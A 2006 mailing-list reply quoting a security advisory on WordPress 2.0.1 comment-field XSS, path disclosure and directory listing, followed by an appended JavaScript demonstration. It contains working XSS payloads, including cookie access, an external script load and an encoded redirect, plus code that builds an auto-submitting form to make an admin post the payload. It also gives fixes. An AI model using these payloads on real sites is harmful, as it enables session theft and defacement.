-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> Risk: Critical!
> Impact: XSS, Full Path Disclosure, Directory Listing

Here a critical bug is arbitrary command execution, account ownage, etc.; an XSS isn't critical at all...

> <+ Full path disclosure & Directory listing +>
> When I discovered this bug, I reported it to some people before public
> disclosure. I was notified that this isn't new and I decided to look at why
> they haven't patched this bug.

So it's not that critical: medium, but nothing critical...

Javor Ninov wrote:
> wp-content/ is also prone to directory listing
>
>
> Javor Ninov aka DrFrancky
>
> k4p0k4p0@xxxxxxxxxxx wrote:
>> /*
>> ---------------------------------------------------------------
>> [N]eo [S]ecurity [T]eam [NST]® WordPress 2.0.1 Multiple Vulnerabilities
>> ---------------------------------------------------------------
>> Program : WordPress 2.0
>> Homepage: http://www.wordpress.org
>> Vulnerable Versions: WordPress 2.0.1 & lower ones
>> Risk: Critical!
>> Impact: XSS, Full Path Disclosure, Directory Listing
>>
>> -> WordPress 2.0.1 Multiple Vulnerabilities <-
>> ---------------------------------------------------------------
>>
>> - Description
>> ---------------------------------------------------------------
>> WordPress is a state-of-the-art semantic personal publishing platform with
>> a focus on aesthetics, web standards, and usability. What a mouthful.
>> WordPress is both free and priceless at the same time.
>>
>> - Tested
>> ---------------------------------------------------------------
>> Tested in localhost & many blogs
>>
>> - Bug
>> ---------------------------------------------------------------
>> The vendor was contacted about some other coding errors that are not
>> described here; the vendor was notified about these bugs when this
>> advisory was published.
>>
>> <+ Multiple XSS +>
>> There are multiple XSS in `post comment':
>>
>> [1] The `name' variable is not filtered when it's assigned to `value' on the
>> `<input>' in the form when the comment is posted.
>> [2] The same as [1] happens with the `website' variable.
>> [3] `comment': this variable only filters the " and ' chars, which makes it
>> possible to use < and >, thus permitting an attacker to inject any HTML (or
>> script) code he/she wants, but without any " or ' character. This only
>> happens if the user that posts the comment is the admin (any registered kind
>> of `user').
>>
>> If you (or the victim) are an unregistered user, you can use " and ' in your
>> HTML/script injection using the `name' or `website' variables, but if the
>> victim is the admin or a registered user these 2 fields described above
>> aren't available in the form, so you cannot even give a value to them. The
>> only remaining option is to use the `comment' variable, but here we have the
>> problem that we cannot use " or ' in the injected HTML/script and we have to
>> make the admin post the comment (POST method).
>>
>> <+ Full path disclosure & Directory listing +>
>> When I discovered this bug, I reported it to some people before public
>> disclosure. I was notified that this isn't new and I decided to look at why
>> they haven't patched this bug.
>>
>> As this bug isn't patched yet, I tried to find out why and I found something
>> like this in their forum (I don't know if the person that posted this was
>> the admin, but it gives the explanation): (Something like the following,
>> it's not textual). `... these bugs are caused by a badly configured .ini
>> file, it's not a bug generated by the script so it cannot be accepted as a
>> bug of WordPress...'.
>> This is not an acceptable answer; if you think it is, a bug caused because
>> register_globals is Off is the .ini's fault and not the script's. They have
>> to be kidding; if they want to make good software, they have to go as far
>> as the language can to prevent all bugs.
>>
>> There are multiple files that don't check if they are being called directly.
>> This is a problem because they expect the functions that the script is
>> going to call to be declared. This kind of bug is taken as a Low Risk bug,
>> but it can help future attacks.
>>
>> - Exploit
>> ---------------------------------------------------------------
>> -- Cross Site Scripting (XSS)
>> PoC:
>> [1] Post a comment with the following values (as unregistered user):
>> (No possible profit)
>>
>> Name   : "><script>alert("WordPress PoC from");</script>
>> Mail   : neosecurityteam@xxxxxxx
>> Website: "><script>alert("[N]eo[S]ecurity[T]eam www.neosecurityteam.net");</script>
>> Comment: www.neosecurityteam.net/foro/
>>
>> The injected HTML code only affects the user that posted it, not others.
>>
>> [2] This way is more interesting and useful. In this case the injected HTML
>> will stay on the board, affecting each person who sees it. But we have two
>> problems:
>> [I ]- This comment must be posted by the admin
>> [II]- We can only use the `comment' field, because the admin form to make
>> the comment doesn't need the `name' or `website'. Also the injected code
>> cannot have any " or ' chars.
>>
>> Here are my solutions:
>> [I ]- We cannot give the admin a `malicious' URL to steal the cookie because
>> it isn't via GET, it's via POST. So the solution is to make a copy of the
>> real form and set the default values of the corresponding field (`comment')
>> to do the stealing. Also make the form submit itself when the page loads.
>> Thus, we give the admin the URL of this form and he/she will post the
>> comment with the values we set before.
>> :)
>> [II]- We can only use this field to make the injection; the `big' problem
>> is that we cannot use " or ' chars, which means that something like
>> window.location = "http://www.google.com.uy"; won't work.
>>
>> Here are some real examples:
>>
>> - <script>alert(document.cookie)</script>
>> - <script>alert(String.fromCharCode(80,111,67,32,111,102,32,87,111,114,
>>   100,80,114,101,115,115,32,98,121,32,75,52,80,48,32,102,114,111,109,32,
>>   78,83,84))</script>
>> - <script src=http://www.neosecurityteam.net></script>
>> - <script>document.location = String.fromCharCode(104,116,116,112,58,47,
>>   47,119,119,119,46,110,101,111,115,101,99,117,114,105,116,121,116,101,
>>   97,109,46,110,101,116)</script>
>>
>> As you can see this bug is exploitable; it's only a matter of knowing a bit
>> more deeply how to do XSS under some conditions. There are more
>> possibilities than described above, investigate yourself.
>>
>> -- Full path disclosure & Directory Listing
>> Directory Listing:
>> www.victim.com/wordpress/wp-includes/
>>
>> Full path disclosure:
>> www.victim.com/wordpress/wp-includes/default-filters.php
>> www.victim.com/wordpress/wp-includes/template-loader.php
>> www.victim.com/wordpress/wp-admin/edit-form-advanced.php
>> www.victim.com/wordpress/wp-admin/edit-form-comment.php
>> www.victim.com/wordpress/wp-includes/rss-functions.php
>> www.victim.com/wordpress/wp-admin/admin-functions.php
>> www.victim.com/wordpress/wp-admin/edit-link-form.php
>> www.victim.com/wordpress/wp-admin/edit-page-form.php
>> www.victim.com/wordpress/wp-admin/admin-footer.php
>> www.victim.com/wordpress/wp-admin/menu-header.php
>> www.victim.com/wordpress/wp-includes/locale.php
>> www.victim.com/wordpress/wp-admin/edit-form.php
>> www.victim.com/wordpress/wp-includes/wp-db.php
>> www.victim.com/wordpress/wp-includes/kses.php
>> www.victim.com/wordpress/wp-includes/vars.php
>> www.victim.com/wordpress/wp-admin/menu.php
>> www.victim.com/wordpress/wp-settings.php
>>
>> - Solutions
>> ---------------------------------------------------------------
>> <+ Cross Site Scripting (XSS) +>
>> Change lines ~21 of 'wp-comments-post.php' to:
>> $comment_author       = htmlentities(trim($_POST['author']));
>> $comment_author_email = htmlentities(trim($_POST['email']));
>> $comment_author_url   = htmlentities(trim($_POST['url']));
>> $comment_content      = htmlentities(trim($_POST['comment']));
>>
>> <+ Full Path Disclosure & Directory Listing +>
>> In the first line of each vulnerable file you should write:
>> if (eregi('name_of_the_file.php', $_SERVER['PHP_SELF']))
>>     die('You are not allowed to see this page directly');
>>
>> - References
>> ---------------------------------------------------------------
>> http://NeoSecurityTeam.net/advisories/Advisory-17.txt
>>
>> - Credits
>> --------------------------------------------------------------
>> Discovered by K4P0-> k4p0k4p0[at]hotmail[dot]com
>>
>> [N]eo [S]ecurity [T]eam [NST]® - http://NeoSecurityTeam.net/
>>
>> Irc.InfoGroup.cl #neosecurityteam
>> Questions? (Eng | Spa) -> http://NeoSecurityTeam.net/foro/
>>
>> - Greets
>> ---------------------------------------------------------------
>> Paisterist HaCkZaTaN Link Daemon21 erg0t NST Community!
>>
>> @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
>> '@@@@@''@@'@@@''''''''@@''@@@''@@
>> '@@'@@@@@@''@@@@@@@@@'''''@@@
>> '@@'''@@@@'''''''''@@@''''@@@
>> @@@@''''@@'@@@@@@@@@@''''@@@@@
>> */
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBRAYZ16+LRXunxpxfAQLBShAAxf21wL1qEpzb1ATERVMwvMoGPKC9PQ3D
CdOZ9Sp0RTZTxLvpWj/6Q3dWp1jn4JB4feXOsD2r55Z45APHcsFNVlUpz/NkrSE+
mEdcj6BhvYq5vPCN8MJbI89L5x5wovKugPA3LGeOFXDnkaCJQXjXJskHV9uJvVLw
Ko1qfr7hmChLWG/1U/4Dfo4Mndq8kw0S7AIwoEMNogd0wgO/sDYrCXyRm6XIGtRf
BM33Gai17YSPi0TlJe4X8+Cyr0ibEKbmJVCJ1cm/s1bQDYHrct0fMb/zRzwczWWe
oSOXK6rM8COQMh9MS+nlCsLIZvkir7Ztp486MOjZ7rkNKIb5q9TIYHzg7UsOh7yM
QOz1tI26Apxy0w1dNNX/fyKAhHMmcMtI1jfMOC/Bo+3L+JZedcCTo4uHkp9xzOkg
k2I8j/QvScdSF+iBueIe9QZQDfd7n5GuoRDpMn47FOAOmMonx4qD+mOvFwPFPuZv
sbitRSEa5BQTYCU5CRflalzEX+H5F9aCrMqQGcRhlygC+ONXDuTCVroR9Cticxbt
QkIw6kgXd9ndUtiaVjG0gObB72NQxh/CMlQCClgZwhgHFSVeHbxUhlofwytjO0Y3
/ss9ehywwLTirq90jjEN51Q6Auun3YXeXxGH5XBkMI9gxo2Wj4x5TudpeS6cJTji
N8IhY+gLiQA=
=LKCE
-----END PGP SIGNATURE-----
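The mechanics the thread argues about, as an added example that is not part of the original post, the quoted advisory, or WordPress itself: the `comment' filter the advisory describes (drops " and ' but keeps < and >), the quote-free String.fromCharCode() payload that slips past it, the auto-submitting POST page from solution [I], and the output encoding that actually neutralises the payload. filterComment is an assumed stand-in for the behaviour the advisory describes, not WordPress's code; the form action and field names in buildAutoSubmitForm are assumptions too. One caveat a practitioner should apply to the advisory's fix: PHP's htmlentities() with its old default flags (ENT_COMPAT) leaves the single quote alone, so the fix should pass ENT_QUOTES; htmlEscape below encodes both quote characters. Runs under Node.js.

```javascript
// Added example (not from the advisory or WordPress). filterComment models the
// filter the advisory describes; it is an assumption, not WordPress's actual code.

// 1. The described filter: " and ' are dropped, < and > survive untouched.
function filterComment(input) {
  return input.replace(/["']/g, "");
}

// 2. Encode a string as a quote-free JS expression, as the advisory's PoC does.
function toFromCharCode(str) {
  const codes = Array.from(str, (ch) => ch.charCodeAt(0));
  return `String.fromCharCode(${codes.join(",")})`;
}

// Decode such an expression without eval(), to see what a payload resolves to.
function decodeFromCharCode(expr) {
  const m = /^String\.fromCharCode\(([\d,\s]*)\)$/.exec(expr);
  if (!m) throw new Error("not a String.fromCharCode(...) expression");
  return String.fromCharCode(...m[1].split(",").map((s) => Number(s.trim())));
}

// 3. Output encoding that makes the payload inert: the analogue of PHP's
// htmlentities($s, ENT_QUOTES). Both quote characters are encoded, which the
// advisory's htmlentities() call without ENT_QUOTES would not do for '.
function htmlEscape(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// True if a <script ...> start tag is still present after processing.
function containsScriptTag(s) {
  return /<script[\s>]/i.test(s);
}

// Solution [I] from the advisory: a page that POSTs the comment for whoever
// loads it. Field values are attribute-escaped so the browser submits them
// byte-for-byte. The action URL and field names are assumptions, not WordPress's.
function buildAutoSubmitForm(action, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `<input type="hidden" name="${htmlEscape(name)}" value="${htmlEscape(value)}">`)
    .join("\n    ");
  return [
    `<body onload="document.forms[0].submit()">`,
    `  <form method="POST" action="${htmlEscape(action)}">`,
    `    ${inputs}`,
    `  </form>`,
    `</body>`,
  ].join("\n");
}

// Run the three cases from the thread against the same target and return them.
function demo() {
  const target = "http://www.neosecurityteam.net";
  const naive = `<script>document.location = "${target}"</script>`;
  const quoteFree = `<script>document.location = ${toFromCharCode(target)}</script>`;
  return {
    naiveAfterFilter: filterComment(naive),          // quotes stripped, script broken
    quoteFreeAfterFilter: filterComment(quoteFree),  // unchanged: still executes
    quoteFreeAfterEscape: htmlEscape(quoteFree),     // rendered as text, inert
  };
}
```

Call demo() to see the three outcomes side by side; buildAutoSubmitForm("/wordpress/wp-comments-post.php", { comment: "<script>alert(document.cookie)</script>" }) shows why the advisory says the admin cannot be handed a plain GET link: the payload has to arrive in a POST body, so it is parked in hidden fields and submitted on load. The escaping in htmlEscape is the real fix for the stored XSS, because it is applied at output and does not rely on which characters the attacker was allowed to type.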